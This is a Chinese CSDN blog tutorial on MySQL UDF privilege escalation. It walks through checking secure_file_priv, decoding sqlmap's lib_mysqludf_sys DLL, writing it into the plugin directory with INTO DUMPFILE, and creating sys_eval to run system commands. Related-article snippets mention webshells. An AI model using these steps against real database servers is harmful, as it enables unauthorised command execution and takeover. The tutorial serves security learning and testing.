mysql udf提权

最新推荐文章于 2024-06-08 15:51:52 发布
最新推荐文章于 2024-06-08 15:51:52 发布
阅读量326 收藏
点赞数
文章标签: mysql windows 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/129600321
版权

UDF

UDF(Userdefined function)可翻译为用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。

UDF提权

使用mysql权限提升为系统权限
前提条件:

  1. 知道mysql用户名和密码,并且可以远程登陆
  2. mysql具有文件写入权限,即secure_file_priv的值为空。

提权步骤

1. 查看mysql是否有写入文件的权限

SHOW GLOBAL VARIABLES LIKE "%secure%"

secure_file_priv是用来限制load dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限。它有三种情况

secure_file_priv的值为null,表示不能写入读取文件
secure_file_priv的值为/tmp/,表示只能写入文件到/tmp
secure_file_priv的值为空,表示允许读取写入文件
在这里插入图片描述
如上图表示mysql有写入的权限

2. 上传UDF的动态链接库
动态链接库就是实现共享函数库概念的一种方式,在windows环境下后缀名为.dll,在linux环境下后缀名为.so 。我们要将该文件放在特定的目录中,该文件中包含了执行系统命令的一些函数
先查看以下插件的位置,我们需要把dll文件放在这个目录下

SHOW GLOBAL VARIABLES LIKE "%plugin%"

在这里插入图片描述
C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\

现在需要上传dll文件,这个dll文件在sqlmap和msf中,sqlmap里面对应的目录地址为\sqlmap\data\udf\mysql,里面分为32位和64位,首先确认一下目标版本

select @@version_compile_os, @@version_compile_machine;

在这里插入图片描述
我这里为64为操作系统版本,所以上传64位的dll文件
sqlmap 中这些动态链接库为了防止被误杀都经过编码处理,不能直接使用。如果后缀名为.so_或.dll_的话,就需要解码,如果后缀名为.so或.dll的话就不需要解码即可直接使用。sqlmap也自带了解码的py脚本,在/extra/cloak目录下,使用cloak.py解密即可。

python cloak.py -d -i lib_mysqludf_sys.dll_ -o udf.dll

有了udf.dll,接下来就需要上传到目标服务器执行,有两种方式

第一种方式:把udf.dll文件先上传到目标服务器,通过into dumpfile方式写入
比如把dll文件上传到d盘下,然后再dump到插件的目录

select hex(load_file('D:\\udf.dll')) into dumpfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll';

第二种方式:直接写入16进制数据,参照文章 MySQL UDF 提权十六进制查询

3.创建自定义函数
上传成功后,执行如下命令创建自定义函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

4.查看是否新增了sys_eval函数

select * from mysql.func;

在这里插入图片描述
5. 执行命令

select sys_eval('whoami')

在这里插入图片描述

小胡yhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL提权——udf提权
hackzkaq的博客
04-11 6420
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
数据库提权Mysql-UDF 提权
网络安全从业者的学习笔记
06-24 620
UDF(user defined function),用户自定义函数。UDF提权是利用数据库将地权限的shell提权到高权限。当我们通过webshell获取到Apache服务器的权限,而获取到的用户只是网络服务权限www或其他普通用户,则我们可以利用mysqlUDF提权获取到管理员权限。
MySQL提权UDF提权
最新发布
2301_76227305的博客
06-08 901
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MySQL提权UDF
不曾扬帆,何以至远方
07-01 1308
MySQL UDFf提权
MySQL提权UDF提权(附带大马)
07-25 1728
Mysql提权UDF
MySQL查看用户权限及权限管理
m0_48440506的博客
04-02 6650
备注:可以使用GRANT重复给用户添加权限,权限叠加,比如你先给用户添加一个select权限,然后又给用户添加一个insert权限,那么该用户就同时拥有了select和insert权限。(2)要想服务器和本机连接,IP 必须是网关的IP,推荐使用 https://www.ipip.net/ 查询自己的 IP。只给175.155.59.133这个 IP 赋给 ctrip 数据库 查询的权限,用户:ctrip,密码:ctrip。前面表示用户,@后面接限制的主机,可以是IP、IP段、域名以及%,%表示任何地方。
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql提权udf
09-20
5. **安全防御**:对于防御者来说,防止MySQL UDF提权的关键在于强化数据库的安全策略。这包括限制不必要的用户权限,禁用对系统表的写入,使用安全的编码和参数化查询以防止SQL注入,以及定期更新和扫描系统以检测...
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
MYSQL高版本低版本UDF提权工具
06-20
描述中的“有两个版本”可能指的是为不同MySQL版本设计的两种UDF提权工具。 在进行UDF提权时,安全专家通常会遵循以下步骤: 1. 分析目标MySQL版本的特性和已知漏洞。 2. 设计或寻找适合的UDF库,该库能够执行提权...
Mysql_udf提权[超详细]|VulnHub-Raven:2渗透测试
qq_60115503的博客
04-22 2878
Mysql内置函数 Mysql有很多内置函数提供给使用者,包括字符串函数,数值函数,日期和时间函数等,给开发人员和使用者带来了很多方便 UDF介绍 Mysql的内置函数虽热丰富,但毕竟不能满足所有人的需求,有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对Mysql进行一些扩展,幸运的是,Mysql给使用者提供了添加新函数的机制,这种使用者自行添加的Mysql函数就称为UDF(User Define Function)UDF机制能够起作用,必须...
【漏洞复现】Mysql UDF提权
cj_Hydra's Blog
11-27 1881
前言: UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。 那么我们该如何使用UDF文件呢? 默认的
Mysql udf提权
weixin_43689084的博客
12-11 1577
Mysql udf提权 操作系统信息和MySQL数据库信息共同决定了udf提权时dii文件导出的位置,通过获取目标服务器的操作系统信息和MySQL数据库版本信息为后续提取奠定基础。 1,获取目标操作系统信息,查看操作系统信息的方法有很多,如果能够执行命令的话,可以通过“systeminfo”命令来获取,如果不能执行命令的话,可以再nmap中通过"nmap target -O"来获取。 2,获取目标...
Mysql udf提权(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDFMySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
mysqludf提权复现
Shanfenglan's blog
03-09 1875
文章目录参考文章 参考文章 udf提权原理详解
MySQL UDF提权
小水池
08-08 9066
0x00 原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。   0x01 思路   1. 将udf文件上传到指定位置  sqlmap中有现成的udf文件,分为32位和64位...
高版本的udf提权
椰树ii
02-08 6541
最近一直在学习技术,虽然过程中遇到了些问题,但都解决了。下面就记录一些吧,给自己老年的时候看,哈哈哈。--怀着一颗低调的心奋发前行。配置环境:phpstudy(mysql5.5.53版本)  2012R2 64位首先访问脚本,是款暗月的mysql全版本通杀提权神器,网上找的。需要输入mysql数据库帐号密码,因为我是本地搭建的,所以帐号密码都是root(具体实战,就要自己去想办法找数据库帐号密码了...
mysql_udf提权
qq_42383069的博客
03-05 3241
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入权限 连接大马,测试下当前我们的权限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此
mysql udf 提权
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值